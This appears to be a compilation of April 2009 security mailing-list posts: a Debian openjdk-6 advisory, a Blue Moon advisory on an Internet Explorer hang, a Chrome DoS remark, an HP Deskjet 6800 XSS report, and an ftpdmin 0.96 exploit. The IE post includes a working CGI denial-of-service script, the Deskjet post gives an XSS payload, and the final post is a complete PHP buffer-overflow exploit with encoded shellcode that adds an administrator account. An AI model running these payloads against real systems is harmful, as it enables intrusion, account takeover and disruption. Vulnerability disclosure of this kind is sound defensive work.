[SECURITY] [DSA 1769-1] New openjdk-6 packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1769-1 secur...@debian.org http://www.debian.org/security/ Florian Weimer April 11, 2009http://www.debian.org/security/faq - Package: openjdk-6 Vulnerability : several Problem type : remote Debian-specific: no CVE Id(s) : CVE-2006-2426 CVE-2009-0581 CVE-2009-0723 CVE-2009-0733 CVE-2009-0793 CVE-2009-1093 CVE-2009-1094 CVE-2009-1095 CVE-2009-1096 CVE-2009-1097 CVE-2009-1098 CVE-2009-1101 Several vulnerabilities have been identified in OpenJDK, an implementation of the Java SE platform. Creation of large, temporary fonts could use up available disk space, leading to a denial of service condition (CVE-2006-2426). Several vulnerabilities existed in the embedded LittleCMS library, exploitable through crafted images: a memory leak, resulting in a denial of service condition (CVE-2009-0581), heap-based buffer overflows, potentially allowing arbitrary code execution (CVE-2009-0723, CVE-2009-0733), and a null-pointer dereference, leading to denial of service (CVE-2009-0793). The LDAP server implementation (in com.sun.jdni.ldap) did not properly close sockets if an error was encountered, leading to a denial-of-service condition (CVE-2009-1093). The LDAP client implementation (in com.sun.jdni.ldap) allowed malicious LDAP servers to execute arbitrary code on the client (CVE-2009-1094). The HTTP server implementation (sun.net.httpserver) contained an unspecified denial of service vulnerability (CVE-2009-1101). Several issues in Java Web Start have been addressed (CVE-2009-1095, CVE-2009-1096, CVE-2009-1097, CVE-2009-1098). The Debian packages currently do not support Java Web Start, so these issues are not directly exploitable, but the relevant code has been updated nevertheless. For the stable distribution (lenny), these problems have been fixed in version 9.1+lenny2. We recommend that you upgrade your openjdk-6 packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11-9.1+lenny2.dsc Size/MD5 checksum: 2471 ac801bf95b5a70dc2872d3829662ec21 http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11.orig.tar.gz Size/MD5 checksum: 51692912 a409bb4e935a22dcbd3529dc098c58de http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6_6b11-9.1+lenny2.diff.gz Size/MD5 checksum: 294391 8245a20f2c8886f5a21ccc584be55963 Architecture independent packages: http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-doc_6b11-9.1+lenny2_all.deb Size/MD5 checksum: 12053188 aca3fd411328bdb8ebaecc32cb5dec8c http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre-lib_6b11-9.1+lenny2_all.deb Size/MD5 checksum: 5270602 ac2ec87d2254d75888025068260724c9 http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-source_6b11-9.1+lenny2_all.deb Size/MD5 checksum: 26557844 4162900f514b37b46bd3445c31137038 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jdk_6b11-9.1+lenny2_alpha.deb Size/MD5 checksum: 8173896 624e143dcca33faeef6f18b3b2dbf091 http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre_6b11-9.1+lenny2_alpha.deb Size/MD5 checksum: 260278 bec0a9dbb3193958ea38849920f207b1 http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jre-headless_6b11-9.1+lenny2_alpha.deb Size/MD5 checksum: 21624912 8d671cce12b85a8c2a275b27ffdefc3c http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-dbg_6b11-9.1+lenny2_alpha.deb Size/MD5 checksum: 34552586 9ef7d040a16bfb7cda895fe080a89639 http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-demo_6b11-9.1+lenny2_alpha.deb Size/MD5 checksum: 2373440 4a642fce362f92b7fa55ce07b9cf64ad amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-dbg_6b11-9.1+lenny2_amd64.deb Size/MD5 checksum: 46891228 ac3e2086cf139e8243b38c6edbd80dc7 http://security.debian.org/pool/updates/main/o/openjdk-6/openjdk-6-jdk_6b11-9.1+lenny2_amd64.deb Size/MD5 checksum: 9658430 552cfaa8544f5eedd8b9fea5188e77c5
[BMSA 2009-04] Remote DoS in Internet Explorer
BLUE MOON SECURITY ADVISORY 2009-04 === :Title: Remote Denial of Service in Internet Explorer :Severity: Moderate :Reporter: Blue Moon Consulting :Products: Internet Explorer 7 and 8 :Fixed in: -- Description --- We could not find out the definitive description for Internet Explorer from Microsoft website. This is our own understanding of the application: Internet Explorer is a web browser. We have discovered a remote DoS vulnerability in Internet Explorer 7 and 8. When visit a malicious page, the browser may freeze indefinitely and killing it in Task Manager is required. With IE8's default settings, killing the tab process simply launches another process and goes to the same malicious page, hence repeating the cycle. The root cause is unknown to us. We suspect that it is related to the display of unprintable characters on Windows XP, and Vista. The same problem does not occur in Windows 7. Microsoft has classified this vulnerability as a stability (not security) issue and will be addressing it in the next version of the application. Workaround -- There is no workaround. Fix --- This problem is to be fixed in the next version of Internet Explorer. Disclosure -- Blue Moon Consulting adapts `RFPolicy v2.0 http://www.wiretrip.net/rfp/policy.html`_ in notifying vendors. :Initial vendor contact: March 19, 2009: Initial contact sent to sec...@microsoft.com. :Vendor response: March 19, 2009: Tony replied stating the preference for PGP communication. :Further communication: March 20, 2009: Technical details and PoC code were sent to Tony, in PGP MIME format. March 20, 2009: Tony replied with a new case identifier MSRC 9011jr and informed us of a new case manager, Jack. March 21, 2009: We further reported that IE 8 was affected by the same bug, in PGP MIME format. March 30, 2009: We asked if Microsoft had received our PoC. March 31, 2009: Jack confirmed the receipt, and replied that Microsoft could not reproduce the behavior of this bug. April 01, 2009: We clarified that we tested with IE 7, and IE 8 on Vista Business. Sent in PGP MIME format. April 01, 2009: Jack said the email was stripped out and asked us to resend. April 02, 2009: We resent the last email in plain text. April 03, 2009: Jack told us Microsoft only experienced temporary DoS and in no case did Internet Explorer hang indefinitely. April 06, 2009: We sent Jack a video clip, in PGP MIME format. April 06, 2009: Jack asked us to resend because the email was stripped again. April 07, 2009: We resent the clip in plain text to Jack. April 09, 2009: Jack acknowledged the receipt and let us know the bug would be fixed in the next version of Internet Explorer. April 09, 2009: We asked for a confirmation of bug classification. April 09, 2009: Jack confirmed this bug was classified as stability, instead of a security issue. We therefore decided to release this advisory to the public. :Public disclosure: April 11, 2009 :Exploit code: The following CGI script causes IE to hang indefinitely. :: #!C:/python25/python import sys import random CHAR_SET = [chr(x) for x in range(0x20)] CHAR_SET += [chr(x) for x in range(128, 256)] def send_file(): l = 80 + 4096 print Content-Type: text/plain print Content-Length: %d % l print Cache-Control: no-cache, no-store, must-revalidate # this is not standardized, but use it anyway print Pragma: no-cache print # bypass IE download dialog sys.stdout.write(a * 4096) # print junks for i in xrange(l): sys.stdout.write(random.choice(CHAR_SET)) sys.exit() send_file() Disclaimer -- The information provided in this advisory is provided as is without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time. Cheers -- Nam Nguyen Blue Moon Consulting Co., Ltd http://www.bluemoon.com.vn
In Response to Bid 34130 Invalid
The observed behavior is explained on below mentioned link http://zeroknock.blogspot.com/2009/04/google-chrome-alert-single-thread-out.html This vulnerability persists in newer version of Google Chrome too.
HP Deskjet 6800 XSS in Web Interface
A Cross-site scripting input validation error has been identified in the web interface of the HP Deskjet 6800 printer family. By sending a string such as scriptalert(found XSS on this page)/script via a POST request to /refresh_rate.htm the resulting error page will execute the script. Verified on Deskjet 6840 firmware version: XF1M131A, but the firmware seems to be generic to the 6800 family, so possibly the entire family is vulnerable. Vulnerability Timeline: 3/21/09: Vendor notification via email 3/21/09: Vendor upgrades ticket to next level of support 3/31/09: Vendor's Advanced Support Group replies: the issue that you are experiencing is due to faulty firmware of the printer and as a result the printer needs to be serviced from a HP authorized service center. 3/31/09: I Reply asking what firmware version fixes the issue and ask if this vulnerability has been reported previously 3/31/09: Vendor replys: I regret to inform you that there is no specific firmware is available for your printer. As the issue is related to the hardware of the printer, it is beyond the scope of our email support and needs the personal attention of a technician. I would suggest you to get the printer serviced at the nearest HP Authorised service centre. For your convenience I provided below information to locate the nearest HP Authorised service centre.
ftpdmin v. 0.96 RNFR remote buffer overflow exploit
?php /* ftpdmin v. 0.96 RNFR remote buffer overflow exploit (xp sp3 / case study) by Nine:Situations:Group::surfista software site: http://www.sentex.net/~mwandel/ftpdmin/ our site: http://retrogod.altervista.org/ bug found by rgod in 2006, RNFR sequences can trigger a simple eip overwrite. We can use 272 bytes before EIP and 119 after EIP, ESP and EBP points to the second memory region. We have a very small set of chars that we can use ,RNFR (Rename From) command accept pathnames as argument, so characters whose integer representations are in the range from zero through 31 and reserved chars are not allowed! */ error_reporting(7); $ftp_server = 192.168.0.1; $ftp_user = anonymous; $ftp_pass = a...@email.com; function ftp_cmd($cmd){ global $conn_id; echo - .$cmd.\n; $buff=ftp_raw($conn_id,$cmd); } #WinExec shellcode of mine, enconded with the alpha2 tool by SkyLined, adds #a surfista admin user with pass pass #contains hardcoded address, re-encode command: #alpha2 esp shdmp.txt $scode=TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI. Xkb3SkfQkpBp4qo0nhBcaZPSMknMq3mValkOYCtqYPYxxhKO9okOe3BMrD5pTocS5. prnReqDWPCev32e1BWPt3sEQbRFE9T3PtqqWPRPSQPsBSUpTosqctRdWPGVa6epPN. w5F4EpRlRossG1PLw7brpOrupP5paQ1tPmaypnSYbSPtd2Pa44BOT2T3UpfOw1qTw. 4gPqcpupr3VQybSrTE1kOA; #do not touch, esp adjustment and subsequent call esp, very large but we have lots of unused space $code =TY7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI. NcXl1oK3JLsOOs8lSOMSXlQoK3zL14KOm4F22EbSrOpusBSSsUGPpipdUpesVVA; if (strlen($scode) 272) {die([!] shellcode too large!);} $conn_id = ftp_connect($ftp_server) or die((!) Unable to connect to $ftp_server); if (@ftp_login($conn_id, $ftp_user, $ftp_pass)) { echo (*) Connected as $ftp_u...@$ftp_server\n; } else { die((!) Unable to connect as $ftp_user\n); } $jnk = str_repeat(\x66,272 - strlen($scode)); $eip=\x44\x3a\x41\x7e; //0x7E413A44 jmp esp, user32.dll xp sp3 $jnk_ii = str_repeat(\x66,119 - strlen($code)); $bof=$scode.$jnk.$eip.$code.$jnk_ii; $boom=RNFR .str_repeat(x,0x0096); ftp_cmd($boom); $boom=RNFR .$bof; ftp_cmd($boom); $boom=RNFR .str_repeat(x,0x0208); ftp_cmd($boom); ftp_close($conn_id); echo (*) Done !\n; ? url: http://retrogod.altervista.org/9sg_ftpdmin_096_rnfr_bof.html